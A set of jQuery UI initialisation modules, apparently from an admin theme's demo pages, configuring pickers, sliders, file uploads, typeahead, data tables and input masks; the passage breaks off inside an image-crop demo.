var FormSamples = function () { return { //main function to initiate the module init: function () { // use select2 dropdown instead of chosen as select2 works fine with bootstrap on responsive layouts. $('.select2_category').select2({ placeholder: "Select an option", allowClear: true }); $('.select2_sample1').select2({ placeholder: "Select a State", allowClear: true }); $(".select2_sample2").select2({ placeholder: "Type to select an option", allowClear: true, minimumInputLength: 1, query: function (query) { var data = { results: [] }, i, j, s; for (i = 1; i < 5; i++) { s = ""; for (j = 0; j < i; j++) { s = s + query.term; } data.results.push({ id: query.term + i, text: s }); } query.callback(data); } }); $(".select2_sample3").select2({ tags: ["red", "green", "blue", "yellow", "pink"] }); } }; }();
JavaScript
var FormFileUpload = function () { return { //main function to initiate the module init: function () { // Initialize the jQuery File Upload widget: $('#fileupload').fileupload({ disableImageResize: false, autoUpload: false, // Uncomment the following to send cross-domain cookies: //xhrFields: {withCredentials: true}, url: 'assets/plugins/jquery-file-upload/server/php/' }); // Enable iframe cross-domain access via redirect option: $('#fileupload').fileupload( 'option', 'redirect', window.location.href.replace( /\/[^\/]*$/, '/cors/result.html?%s' ) ); // Demo settings: $('#fileupload').fileupload('option', { url: $('#fileupload').fileupload('option', 'url'), // Enable image resizing, except for Android and Opera, // which actually support image resizing, but fail to // send Blob objects via XHR requests: disableImageResize: /Android(?!.*Chrome)|Opera/.test(window.navigator.userAgent), maxFileSize: 5000000, acceptFileTypes: /(\.|\/)(gif|jpe?g|png)$/i }); // Upload server status check for browsers with CORS support: if ($.support.cors) { $.ajax({ url: 'assets/plugins/jquery-file-upload/server/php/', type: 'HEAD' }).fail(function () { $('<div class="alert alert-danger"/>') .text('Upload server currently unavailable - ' + new Date()) .appendTo('#fileupload'); }); } // Load & display existing files: $('#fileupload').addClass('fileupload-processing'); $.ajax({ // Uncomment the following to send cross-domain cookies: //xhrFields: {withCredentials: true}, url: $('#fileupload').fileupload('option', 'url'), dataType: 'json', context: $('#fileupload')[0] }).always(function () { $(this).removeClass('fileupload-processing'); }).done(function (result) { $(this).fileupload('option', 'done') .call(this, $.Event('done'), {result: result}); }); } }; }();
JavaScript
var ComponentsPickers = function () { var handleDatePickers = function () { if (jQuery().datepicker) { $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); $('body').removeClass("modal-open"); // fix bug when inline picker is used in modal } } var handleTimePickers = function () { if (jQuery().timepicker) { $('.timepicker-default').timepicker({ autoclose: true, showSeconds: true, minuteStep: 1 }); $('.timepicker-no-seconds').timepicker({ autoclose: true, minuteStep: 5 }); $('.timepicker-24').timepicker({ autoclose: true, minuteStep: 5, showSeconds: true, showMeridian: false }); // handle input group button click $('.timepicker').parent('.input-group').on('click', '.input-group-btn', function(e){ e.preventDefault(); $(this).parent('.input-group').find('.timepicker').timepicker('showWidget'); }); } } var handleDateRangePickers = function () { if (!jQuery().daterangepicker) { return; } $('#defaultrange').daterangepicker({ opens: (App.isRTL() ? 'left' : 'right'), format: 'MM/DD/YYYY', separator: ' to ', startDate: moment().subtract('days', 29), endDate: moment(), minDate: '01/01/2012', maxDate: '12/31/2014', }, function (start, end) { console.log("Callback has been called!"); $('#defaultrange input').val(start.format('MMMM D, YYYY') + ' - ' + end.format('MMMM D, YYYY')); } ); $('#defaultrange_modal').daterangepicker({ opens: (App.isRTL() ? 'left' : 'right'), format: 'MM/DD/YYYY', separator: ' to ', startDate: moment().subtract('days', 29), endDate: moment(), minDate: '01/01/2012', maxDate: '12/31/2014', }, function (start, end) { $('#defaultrange_modal input').val(start.format('MMMM D, YYYY') + ' - ' + end.format('MMMM D, YYYY')); } ); // this is very important fix when daterangepicker is used in modal. in modal when daterange picker is opened and mouse clicked anywhere bootstrap modal removes the modal-open class from the body element. // so the below code will fix this issue. $('#defaultrange_modal').on('click', function(){ if ($('#daterangepicker_modal').is(":visible") && $('body').hasClass("modal-open") == false) { $('body').addClass("modal-open"); } }); $('#reportrange').daterangepicker({ opens: (App.isRTL() ? 'left' : 'right'), startDate: moment().subtract('days', 29), endDate: moment(), minDate: '01/01/2012', maxDate: '12/31/2014', dateLimit: { days: 60 }, showDropdowns: true, showWeekNumbers: true, timePicker: false, timePickerIncrement: 1, timePicker12Hour: true, ranges: { 'Today': [moment(), moment()], 'Yesterday': [moment().subtract('days', 1), moment().subtract('days', 1)], 'Last 7 Days': [moment().subtract('days', 6), moment()], 'Last 30 Days': [moment().subtract('days', 29), moment()], 'This Month': [moment().startOf('month'), moment().endOf('month')], 'Last Month': [moment().subtract('month', 1).startOf('month'), moment().subtract('month', 1).endOf('month')] }, buttonClasses: ['btn'], applyClass: 'green', cancelClass: 'default', format: 'MM/DD/YYYY', separator: ' to ', locale: { applyLabel: 'Apply', fromLabel: 'From', toLabel: 'To', customRangeLabel: 'Custom Range', daysOfWeek: ['Su', 'Mo', 'Tu', 'We', 'Th', 'Fr', 'Sa'], monthNames: ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'], firstDay: 1 } }, function (start, end) { console.log("Callback has been called!"); $('#reportrange span').html(start.format('MMMM D, YYYY') + ' - ' + end.format('MMMM D, YYYY')); } ); //Set the initial state of the picker label $('#reportrange span').html(moment().subtract('days', 29).format('MMMM D, YYYY') + ' - ' + moment().format('MMMM D, YYYY')); } var handleDatetimePicker = function () { $(".form_datetime").datetimepicker({ autoclose: true, isRTL: App.isRTL(), format: "dd MM yyyy - hh:ii", pickerPosition: (App.isRTL() ? "bottom-right" : "bottom-left") }); $(".form_advance_datetime").datetimepicker({ isRTL: App.isRTL(), format: "dd MM yyyy - hh:ii", autoclose: true, todayBtn: true, startDate: "2013-02-14 10:00", pickerPosition: (App.isRTL() ? "bottom-right" : "bottom-left"), minuteStep: 10 }); $(".form_meridian_datetime").datetimepicker({ isRTL: App.isRTL(), format: "dd MM yyyy - HH:ii P", showMeridian: true, autoclose: true, pickerPosition: (App.isRTL() ? "bottom-right" : "bottom-left"), todayBtn: true }); $('body').removeClass("modal-open"); // fix bug when inline picker is used in modal } var handleClockfaceTimePickers = function () { if (!jQuery().clockface) { return; } $('.clockface_1').clockface(); $('#clockface_2').clockface({ format: 'HH:mm', trigger: 'manual' }); $('#clockface_2_toggle').click(function (e) { e.stopPropagation(); $('#clockface_2').clockface('toggle'); }); $('#clockface_2_modal').clockface({ format: 'HH:mm', trigger: 'manual' }); $('#clockface_2_modal_toggle').click(function (e) { e.stopPropagation(); $('#clockface_2_modal').clockface('toggle'); }); $('.clockface_3').clockface({ format: 'H:mm' }).clockface('show', '14:30'); } var handleColorPicker = function () { if (!jQuery().colorpicker) { return; } $('.colorpicker-default').colorpicker({ format: 'hex' }); $('.colorpicker-rgba').colorpicker(); } return { //main function to initiate the module init: function () { handleDatePickers(); handleTimePickers(); handleDatetimePicker(); handleDateRangePickers(); handleClockfaceTimePickers(); handleColorPicker(); } }; }();
JavaScript
/** Custom module for you to write your own javascript functions **/ var Custom = function () { // private functions & variables var myFunc = function(text) { alert(text); } // public functions return { //main function init: function () { //initialize here something. }, //some helper function doSomeStuff: function () { myFunc(); } }; }(); /*** Usage ***/ //Custom.init(); //Custom.doSomeStuff();
JavaScript
var UIDatepaginator = function () { return { //main function to initiate the module init: function () { //sample #1 $('#datepaginator_sample_1').datepaginator(); //sample #2 $('#datepaginator_sample_2').datepaginator({ size: "large" }); //sample #3 $('#datepaginator_sample_3').datepaginator({ size: "small" }); //sample #3 $('#datepaginator_sample_4').datepaginator({ onSelectedDateChanged: function(event, date) { alert("Selected date: " + moment(date).format("Do, MMM YYYY")); } }); } // end init }; }();
JavaScript
var MapsVector = function () { var setMap = function (name) { var data = { map: 'world_en', backgroundColor: null, borderColor: '#333333', borderOpacity: 0.5, borderWidth: 1, color: '#c6c6c6', enableZoom: true, hoverColor: '#c9dfaf', hoverOpacity: null, values: sample_data, normalizeFunction: 'linear', scaleColors: ['#b6da93', '#427d1a'], selectedColor: '#c9dfaf', selectedRegion: null, showTooltip: true, onRegionOver: function (event, code) { //sample to interact with map if (code == 'ca') { event.preventDefault(); } }, onRegionClick: function (element, code, region) { //sample to interact with map var message = 'You clicked "' + region + '" which has the code: ' + code.toUpperCase(); alert(message); } }; data.map = name + '_en'; var map = jQuery('#vmap_' + name); if (!map) { return; } map.width(map.parent().width()); map.vectorMap(data); } return { //main function to initiate map samples init: function () { setMap("world"); setMap("usa"); setMap("europe"); setMap("russia"); setMap("germany"); // redraw maps on window or content resized App.addResponsiveHandler(function(){ setMap("world"); setMap("usa"); setMap("europe"); setMap("russia"); setMap("germany"); }); } }; }();
JavaScript
var ComponentsjQueryUISliders = function () { return { //main function to initiate the module init: function () { // basic $(".slider-basic").slider(); // basic sliders // vertical range sliders $("#slider-range").slider({ isRTL: App.isRTL(), range: true, values: [17, 67], slide: function (event, ui) { $("#slider-range-amount").text("$" + ui.values[0] + " - $" + ui.values[1]); } }); // snap inc $("#slider-snap-inc").slider({ isRTL: App.isRTL(), value: 100, min: 0, max: 1000, step: 100, slide: function (event, ui) { $("#slider-snap-inc-amount").text("$" + ui.value); } }); $("#slider-snap-inc-amount").text("$" + $("#slider-snap-inc").slider("value")); // range slider $("#slider-range").slider({ isRTL: App.isRTL(), range: true, min: 0, max: 500, values: [75, 300], slide: function (event, ui) { $("#slider-range-amount").text("$" + ui.values[0] + " - $" + ui.values[1]); } }); $("#slider-range-amount").text("$" + $("#slider-range").slider("values", 0) + " - $" + $("#slider-range").slider("values", 1)); //range max $("#slider-range-max").slider({ isRTL: App.isRTL(), range: "max", min: 1, max: 10, value: 2, slide: function (event, ui) { $("#slider-range-max-amount").text(ui.value); } }); $("#slider-range-max-amount").text($("#slider-range-max").slider("value")); // range min $("#slider-range-min").slider({ isRTL: App.isRTL(), range: "min", value: 37, min: 1, max: 700, slide: function (event, ui) { $("#slider-range-min-amount").text("$" + ui.value); } }); $("#slider-range-min-amount").text("$" + $("#slider-range-min").slider("value")); // vertical slider $("#slider-vertical").slider({ isRTL: App.isRTL(), orientation: "vertical", range: "min", min: 0, max: 100, value: 60, slide: function (event, ui) { $("#slider-vertical-amount").text(ui.value); } }); $("#slider-vertical-amount").text($("#slider-vertical").slider("value")); // vertical range sliders $("#slider-range-vertical").slider({ isRTL: App.isRTL(), orientation: "vertical", range: true, values: [17, 67], slide: function (event, ui) { $("#slider-range-vertical-amount").text("$" + ui.values[0] + " - $" + ui.values[1]); } }); $("#slider-range-vertical-amount").text("$" + $("#slider-range-vertical").slider("values", 0) + " - $" + $("#slider-range-vertical").slider("values", 1)); } }; }();
JavaScript
var Search = function () { return { //main function to initiate the module init: function () { if (jQuery().datepicker) { $('.date-picker').datepicker(); } App.initFancybox(); } }; }();
JavaScript
var ComponentsIonSliders = function () { return { //main function to initiate the module init: function () { $("#range_1").ionRangeSlider({ min: 0, max: 5000, from: 1000, to: 4000, type: 'double', step: 1, prefix: "$", prettify: false, hasGrid: true }); $("#range_2").ionRangeSlider(); $("#range_5").ionRangeSlider({ min: 0, max: 10, type: 'single', step: 0.1, postfix: " mm", prettify: false, hasGrid: true }); $("#range_6").ionRangeSlider({ min: -50, max: 50, from: 0, type: 'single', step: 1, postfix: "°", prettify: false, hasGrid: true }); $("#range_4").ionRangeSlider({ type: "single", step: 100, postfix: " light years", from: 55000, hideText: true }); $("#range_3").ionRangeSlider({ type: "double", postfix: " miles", step: 10000, from: 25000000, to: 35000000, onChange: function(obj){ var t = ""; for(var prop in obj) { t += prop + ": " + obj[prop] + "\r\n"; } $("#result").html(t); } }); $("#updateLast").on("click", function(){ $("#range_3").ionRangeSlider("update", { min: Math.round(10000 + Math.random() * 40000), max: Math.round(200000 + Math.random() * 100000), step: 1, from: Math.round(40000 + Math.random() * 40000), to: Math.round(150000 + Math.random() * 80000) }); }); } }; }();
JavaScript
var EcommerceOrders = function () { var initPickers = function () { //init date pickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); } var handleOrders = function() { var grid = new Datatable(); grid.init({ src: $("#datatable_orders"), onSuccess: function(grid) { // execute some code after table records loaded }, onError: function(grid) { // execute some code on network or other general error }, dataTable: { // here you can define a typical datatable settings from http://datatables.net/usage/options "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, // default record count per page "bServerSide": true, // server side processing "sAjaxSource": "demo/ecommerce_orders.php", // ajax source "aaSorting": [[ 1, "asc" ]] // set first column as a default sort by asc } }); // handle group actionsubmit button click grid.getTableWrapper().on('click', '.table-group-action-submit', function(e){ e.preventDefault(); var action = $(".table-group-action-input", grid.getTableWrapper()); if (action.val() != "" && grid.getSelectedRowsCount() > 0) { grid.addAjaxParam("sAction", "group_action"); grid.addAjaxParam("sGroupActionName", action.val()); var records = grid.getSelectedRows(); for (var i in records) { grid.addAjaxParam(records[i]["name"], records[i]["value"]); } grid.getDataTable().fnDraw(); grid.clearAjaxParams(); } else if (action.val() == "") { App.alert({type: 'danger', icon: 'warning', message: 'Please select an action', container: grid.getTableWrapper(), place: 'prepend'}); } else if (grid.getSelectedRowsCount() === 0) { App.alert({type: 'danger', icon: 'warning', message: 'No record selected', container: grid.getTableWrapper(), place: 'prepend'}); } }); } return { //main function to initiate the module init: function () { initPickers(); handleOrders(); } }; }();
JavaScript
var EcommerceProductsEdit = function () { var handleImages = function() { // see http://www.plupload.com/ var uploader = new plupload.Uploader({ runtimes : 'html5,flash,silverlight,html4', browse_button : document.getElementById('tab_images_uploader_pickfiles'), // you can pass in id... container: document.getElementById('tab_images_uploader_container'), // ... or DOM Element itself url : "assets/plugins/plupload/examples/upload.php", filters : { max_file_size : '10mb', mime_types: [ {title : "Image files", extensions : "jpg,gif,png"}, {title : "Zip files", extensions : "zip"} ] }, // Flash settings flash_swf_url : 'assets/plugins/plupload/js/Moxie.swf', // Silverlight settings silverlight_xap_url : 'assets/plugins/plupload/js/Moxie.xap', init: { PostInit: function() { $('#tab_images_uploader_filelist').html(""); $('#tab_images_uploader_uploadfiles').click(function() { uploader.start(); return false; }); $('#tab_images_uploader_filelist').on('click', '.added-files .remove', function(){ uploader.removeFile($(this).parent('.added-files').attr("id")); $(this).parent('.added-files').remove(); }); }, FilesAdded: function(up, files) { plupload.each(files, function(file) { $('#tab_images_uploader_filelist').append('<div class="alert alert-warning added-files" id="uploaded_file_' + file.id + '">' + file.name + '(' + plupload.formatSize(file.size) + ') <span class="status label label-info"></span>&nbsp;<a href="javascript:;" style="margin-top:-5px" class="remove pull-right btn btn-sm red"><i class="fa fa-times"></i> remove</a></div>'); }); }, UploadProgress: function(up, file) { $('#uploaded_file_' + file.id + ' > .status').html(file.percent + '%'); }, FileUploaded: function(up, file, response) { var response = $.parseJSON(response.response); if (response.result && response.result == 'OK') { var id = response.id; // uploaded file's unique name. Here you can collect uploaded file names and submit an jax request to your server side script to process the uploaded files and update the images tabke $('#uploaded_file_' + file.id + ' > .status').removeClass("label-info").addClass("label-success").html('<i class="fa fa-check"></i> Done'); // set successfull upload } else { $('#uploaded_file_' + file.id + ' > .status').removeClass("label-info").addClass("label-danger").html('<i class="fa fa-warning"></i> Failed'); // set failed upload App.alert({type: 'danger', message: 'One of uploads failed. Please retry.', closeInSeconds: 10, icon: 'warning'}); } }, Error: function(up, err) { App.alert({type: 'danger', message: err.message, closeInSeconds: 10, icon: 'warning'}); } } }); uploader.init(); } var handleReviews = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_reviews"), dataTable: { // here you can define a typical datatable settings from http://datatables.net/usage/options "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, "bServerSide": true, "sAjaxSource": "demo/ecommerce_product_reviews.php", "aoColumnDefs" : [{ // define columns sorting options(by default all columns are sortable extept the first checkbox column) 'bSortable' : true }], "aaSorting": [[ 0, "asc" ]] // set first column as a default sort by asc } }); } var handleHistory = function () { var grid = new Datatable(); grid.init({ src: $("#datatable_history"), dataTable: { // here you can define a typical datatable settings from http://datatables.net/usage/options "aLengthMenu": [ [20, 50, 100, 150, -1], [20, 50, 100, 150, "All"] // change per page values here ], "iDisplayLength": 20, "bServerSide": true, "sAjaxSource": "demo/ecommerce_product_history.php", "aoColumnDefs" : [{ // define columns sorting options(by default all columns are sortable extept the first checkbox column) 'bSortable' : true }], "aaSorting": [[ 0, "asc" ]] // set first column as a default sort by asc } }); } var initComponents = function () { //init datepickers $('.date-picker').datepicker({ rtl: App.isRTL(), autoclose: true }); //init datetimepickers $(".datetime-picker").datetimepicker({ isRTL: App.isRTL(), autoclose: true, todayBtn: true, pickerPosition: (App.isRTL() ? "bottom-right" : "bottom-left"), minuteStep: 10 }); //init maxlength handler $('.maxlength-handler').maxlength({ limitReachedClass: "label label-danger", alwaysShow: true, threshold: 5 }); } return { //main function to initiate the module init: function () { initComponents(); handleImages(); handleReviews(); handleHistory(); } }; }();
JavaScript
var ComponentsFormTools = function () { var handleTwitterTypeahead = function() { // Example #1 // instantiate the bloodhound suggestion engine var numbers = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.num); }, queryTokenizer: Bloodhound.tokenizers.whitespace, local: [ { num: 'metronic' }, { num: 'keenthemes' }, { num: 'metronic theme' }, { num: 'metronic template' }, { num: 'keenthemes team' } ] }); // initialize the bloodhound suggestion engine numbers.initialize(); // instantiate the typeahead UI $('#typeahead_example_1').typeahead(null, { displayKey: 'num', hint: (App.isRTL() ? false : true), source: numbers.ttAdapter() }); // Example #2 var countries = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.name); }, queryTokenizer: Bloodhound.tokenizers.whitespace, limit: 10, prefetch: { url: 'demo/typeahead_countries.json', filter: function(list) { return $.map(list, function(country) { return { name: country }; }); } } }); countries.initialize(); $('#typeahead_example_2').typeahead(null, { name: 'typeahead_example_2', displayKey: 'name', hint: (App.isRTL() ? false : true), source: countries.ttAdapter() }); // Example #3 var custom = new Bloodhound({ datumTokenizer: function(d) { return d.tokens; }, queryTokenizer: Bloodhound.tokenizers.whitespace, remote: 'demo/typeahead_custom.php?query=%QUERY' }); custom.initialize(); $('#typeahead_example_3').typeahead(null, { name: 'datypeahead_example_3', displayKey: 'name', source: custom.ttAdapter(), hint: (App.isRTL() ? false : true), templates: { suggestion: Handlebars.compile([ '<div class="media">', '<div class="pull-left">', '<div class="media-object">', '<img src="{{img}}" width="50" height="50"/>', '</div>', '</div>', '<div class="media-body">', '<h4 class="media-heading">{{value}}</h4>', '<p>{{desc}}</p>', '</div>', '</div>', ].join('')) } }); // Example #4 var nba = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.team); }, queryTokenizer: Bloodhound.tokenizers.whitespace, prefetch: 'demo/typeahead_nba.json' }); var nhl = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.team); }, queryTokenizer: Bloodhound.tokenizers.whitespace, prefetch: 'demo/typeahead_nhl.json' }); nba.initialize(); nhl.initialize(); $('#typeahead_example_4').typeahead({ hint: (App.isRTL() ? false : true), highlight: true }, { name: 'nba', displayKey: 'team', source: nba.ttAdapter(), templates: { header: '<h3>NBA Teams</h3>' } }, { name: 'nhl', displayKey: 'team', source: nhl.ttAdapter(), templates: { header: '<h3>NHL Teams</h3>' } }); } var handleTwitterTypeaheadModal = function() { // Example #1 // instantiate the bloodhound suggestion engine var numbers = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.num); }, queryTokenizer: Bloodhound.tokenizers.whitespace, local: [ { num: 'metronic' }, { num: 'keenthemes' }, { num: 'metronic theme' }, { num: 'metronic template' }, { num: 'keenthemes team' } ] }); // initialize the bloodhound suggestion engine numbers.initialize(); // instantiate the typeahead UI $('#typeahead_example_modal_1').typeahead(null, { displayKey: 'num', hint: (App.isRTL() ? false : true), source: numbers.ttAdapter() }); // Example #2 var countries = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.name); }, queryTokenizer: Bloodhound.tokenizers.whitespace, limit: 10, prefetch: { url: 'demo/typeahead_countries.json', filter: function(list) { return $.map(list, function(country) { return { name: country }; }); } } }); countries.initialize(); $('#typeahead_example_modal_2').typeahead(null, { name: 'typeahead_example_modal_2', displayKey: 'name', hint: (App.isRTL() ? false : true), source: countries.ttAdapter() }); // Example #3 var custom = new Bloodhound({ datumTokenizer: function(d) { return d.tokens; }, queryTokenizer: Bloodhound.tokenizers.whitespace, remote: 'demo/typeahead_custom.php?query=%QUERY' }); custom.initialize(); $('#typeahead_example_modal_3').typeahead(null, { name: 'datypeahead_example_modal_3', displayKey: 'name', hint: (App.isRTL() ? false : true), source: custom.ttAdapter(), templates: { suggestion: Handlebars.compile([ '<div class="media">', '<div class="pull-left">', '<div class="media-object">', '<img src="{{img}}" width="50" height="50"/>', '</div>', '</div>', '<div class="media-body">', '<h4 class="media-heading">{{value}}</h4>', '<p>{{desc}}</p>', '</div>', '</div>', ].join('')) } }); // Example #4 var nba = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.team); }, queryTokenizer: Bloodhound.tokenizers.whitespace, limit: 3, prefetch: 'demo/typeahead_nba.json' }); var nhl = new Bloodhound({ datumTokenizer: function(d) { return Bloodhound.tokenizers.whitespace(d.team); }, queryTokenizer: Bloodhound.tokenizers.whitespace, limit: 3, prefetch: 'demo/typeahead_nhl.json' }); nba.initialize(); nhl.initialize(); $('#typeahead_example_modal_4').typeahead({ hint: (App.isRTL() ? false : true), highlight: true }, { name: 'nba', displayKey: 'team', source: nba.ttAdapter(), templates: { header: '<h3>NBA Teams</h3>' } }, { name: 'nhl', displayKey: 'team', source: nhl.ttAdapter(), templates: { header: '<h3>NHL Teams</h3>' } }); } var handleBootstrapSwitch = function() { $('.switch-radio1').on('switch-change', function () { $('.switch-radio1').bootstrapSwitch('toggleRadioState'); }); // or $('.switch-radio1').on('switch-change', function () { $('.switch-radio1').bootstrapSwitch('toggleRadioStateAllowUncheck'); }); // or $('.switch-radio1').on('switch-change', function () { $('.switch-radio1').bootstrapSwitch('toggleRadioStateAllowUncheck', false); }); } var handleBootstrapTouchSpin = function() { $("#touchspin_demo1").TouchSpin({ buttondown_class: 'btn green', buttonup_class: 'btn green', min: -1000000000, max: 1000000000, stepinterval: 50, maxboostedstep: 10000000, prefix: '$' }); $("#touchspin_demo2").TouchSpin({ buttondown_class: 'btn blue', buttonup_class: 'btn blue', min: 0, max: 100, step: 0.1, decimals: 2, boostat: 5, maxboostedstep: 10, postfix: '%' }); $("#touchspin_demo3").TouchSpin({ buttondown_class: 'btn green', buttonup_class: 'btn green', prefix: "$", postfix: "%" }); } var handleBootstrapMaxlength = function() { $('#maxlength_defaultconfig').maxlength({ limitReachedClass: "label label-danger", }) $('#maxlength_thresholdconfig').maxlength({ limitReachedClass: "label label-danger", threshold: 20 }); $('#maxlength_alloptions').maxlength({ alwaysShow: true, warningClass: "label label-success", limitReachedClass: "label label-danger", separator: ' out of ', preText: 'You typed ', postText: ' chars available.', validate: true }); $('#maxlength_textarea').maxlength({ limitReachedClass: "label label-danger", alwaysShow: true }); $('#maxlength_placement').maxlength({ limitReachedClass: "label label-danger", alwaysShow: true, placement: App.isRTL() ? 'top-right' : 'top-left' }); } var handleSpinners = function () { $('#spinner1').spinner(); $('#spinner2').spinner({disabled: true}); $('#spinner3').spinner({value:0, min: 0, max: 10}); $('#spinner4').spinner({value:0, step: 5, min: 0, max: 200}); } var handleTagsInput = function () { if (!jQuery().tagsInput) { return; } $('#tags_1').tagsInput({ width: 'auto', 'onAddTag': function () { //alert(1); }, }); $('#tags_2').tagsInput({ width: 300 }); } var handleInputMasks = function () { $.extend($.inputmask.defaults, { 'autounmask': true }); $("#mask_date").inputmask("d/m/y", { autoUnmask: true }); //direct mask $("#mask_date1").inputmask("d/m/y", { "placeholder": "*" }); //change the placeholder $("#mask_date2").inputmask("d/m/y", { "placeholder": "dd/mm/yyyy" }); //multi-char placeholder $("#mask_phone").inputmask("mask", { "mask": "(999) 999-9999" }); //specifying fn & options $("#mask_tin").inputmask({ "mask": "99-9999999" }); //specifying options only $("#mask_number").inputmask({ "mask": "9", "repeat": 10, "greedy": false }); // ~ mask "9" or mask "99" or ... mask "9999999999" $("#mask_decimal").inputmask('decimal', { rightAlignNumerics: false }); //disables the right alignment of the decimal input $("#mask_currency").inputmask('€ 999.999.999,99', { numericInput: true }); //123456 => € ___.__1.234,56 $("#mask_currency2").inputmask('€ 999,999,999.99', { numericInput: true, rightAlignNumerics: false, greedy: false }); //123456 => € ___.__1.234,56 $("#mask_ssn").inputmask("999-99-9999", { placeholder: " ", clearMaskOnLostFocus: true }); //default } var handleIPAddressInput = function () { $('#input_ipv4').ipAddress(); $('#input_ipv6').ipAddress({ v: 6 }); } var handlePasswordStrengthChecker = function () { var initialized = false; var input = $("#password_strength"); input.keydown(function () { if (initialized === false) { // set base options input.pwstrength({ raisePower: 1.4, minChar: 8, verdicts: ["Weak", "Normal", "Medium", "Strong", "Very Strong"], scores: [17, 26, 40, 50, 60] }); // add your own rule to calculate the password strength input.pwstrength("addRule", "demoRule", function (options, word, score) { return word.match(/[a-z].[0-9]/) && score; }, 10, true); // set as initialized initialized = true; } }); } var handleUsernameAvailabilityChecker1 = function () { var input = $("#username1_input"); $("#username1_checker").click(function (e) { var pop = $(this); if (input.val() === "") { input.closest('.form-group').removeClass('has-success').addClass('has-error'); pop.popover('destroy'); pop.popover({ 'placement': (App.isRTL() ? 'left' : 'right'), 'html': true, 'container': 'body', 'content': 'Please enter a username to check its availability.', }); // add error class to the popover pop.data('bs.popover').tip().addClass('error'); // set last poped popover to be closed on click(see App.js => handlePopovers function) App.setLastPopedPopover(pop); pop.popover('show'); e.stopPropagation(); // prevent closing the popover return; } var btn = $(this); btn.attr('disabled', true); input.attr("readonly", true). attr("disabled", true). addClass("spinner"); $.post('demo/username_checker.php', { username: input.val() }, function (res) { btn.attr('disabled', false); input.attr("readonly", false). attr("disabled", false). removeClass("spinner"); if (res.status == 'OK') { input.closest('.form-group').removeClass('has-error').addClass('has-success'); pop.popover('destroy'); pop.popover({ 'html': true, 'placement': (App.isRTL() ? 'left' : 'right'), 'container': 'body', 'content': res.message, }); pop.popover('show'); pop.data('bs.popover').tip().removeClass('error').addClass('success'); } else { input.closest('.form-group').removeClass('has-success').addClass('has-error'); pop.popover('destroy'); pop.popover({ 'html': true, 'placement': (App.isRTL() ? 'left' : 'right'), 'container': 'body', 'content': res.message, }); pop.popover('show'); pop.data('bs.popover').tip().removeClass('success').addClass('error'); App.setLastPopedPopover(pop); } }, 'json'); }); } var handleUsernameAvailabilityChecker2 = function () { $("#username2_input").change(function () { var input = $(this); if (input.val() === "") { return; } input.attr("readonly", true). attr("disabled", true). addClass("spinner"); $.post('demo/username_checker.php', { username: input.val() }, function (res) { input.attr("readonly", false). attr("disabled", false). removeClass("spinner"); // change popover font color based on the result if (res.status == 'OK') { input.closest('.form-group').removeClass('has-error').addClass('has-success'); $('.icon-exclamation-sign', input.closest('.form-group')).remove(); input.before('<i class="icon-ok"></i>'); input.data('bs.popover').tip().removeClass('error').addClass('success'); } else { input.closest('.form-group').removeClass('has-success').addClass('has-error'); $('.icon-ok', input.closest('.form-group')).remove(); input.before('<i class="icon-exclamation-sign"></i>'); input.popover('destroy'); input.popover({ 'html': true, 'placement': (App.isRTL() ? 'left' : 'right'), 'container': 'body', 'content': res.message, }); input.popover('show'); input.data('bs.popover').tip().removeClass('success').addClass('error'); App.setLastPopedPopover(input); } }, 'json'); }); } return { //main function to initiate the module init: function () { handleTwitterTypeahead(); handleTwitterTypeaheadModal(); handleBootstrapSwitch(); handleBootstrapTouchSpin(); handleBootstrapMaxlength(); handleSpinners(); handleTagsInput(); handleInputMasks(); handleIPAddressInput(); handlePasswordStrengthChecker(); handleUsernameAvailabilityChecker1(); handleUsernameAvailabilityChecker2(); } }; }();
JavaScript
var ComingSoon = function () { return { //main function to initiate the module init: function () { $.backstretch([ "assets/img/bg/1.jpg", "assets/img/bg/2.jpg", "assets/img/bg/3.jpg", "assets/img/bg/4.jpg" ], { fade: 1000, duration: 10000 }); var austDay = new Date(); austDay = new Date(austDay.getFullYear() + 1, 1 - 1, 26); $('#defaultCountdown').countdown({until: austDay}); $('#year').text(austDay.getFullYear()); } }; }();
JavaScript
var FormImageCrop = function () { var demo1 = function() { $('#demo1').Jcrop(); } var demo2 = function() { var jcrop_api; $('#demo2').Jcrop({ onChange: showCoords, onSelect: showCoords, onRelease: clearCoords },function(){ jcrop_api = this; }); $('#coords').on('change','input',function(e){ var x1 = $('#x1').val(), x2 = $('#x2').val(), y1 = $('#y1').val(), y2 = $('#y2').val(); jcrop_api.setSelect([x1,y1,x2,y2]); }); // Simple event handler, called from onChange and onSelect // event handlers, as per the Jcrop invocation above function showCoords(c) { $('#x1').val(c.x); $('#y1').val(c.y); $('#x2').val(c.x2); $('#y2').val(c.y2); $('#w').val(c.w); $('#h').val(c.h); }; function clearCoords() { $('#coords input').val(''); }; } var demo3 = function() { // Create variables (in this scope) to hold the API and image size var jcrop_api, boundx, boundy, // Grab some information about the preview pane $preview = $('#preview-pane'), $pcnt = $('#preview-pane .preview-container'), $pimg = $('#preview-pane .preview-container img'), xsize = $pcnt.width(), ysize = $pcnt.height(); console.log('init',[xsize,ysize]); $('#demo3').Jcrop({ onChange: updatePreview, onSelect: updatePreview, aspectRatio: xsize / ysize },function(){ // Use the API to get the real image size var bounds = this.getBounds(); boundx = bounds[0]; boundy = bounds[1]; // Store the API in the jcrop_api variable jcrop_api = this; // Move the preview into the jcrop container for css positioning $preview.appendTo(jcrop_api.ui.holder); }); function updatePreview(c) { if (parseInt(c.w) > 0) { var rx = xsize / c.w; var ry = ysize / c.h; 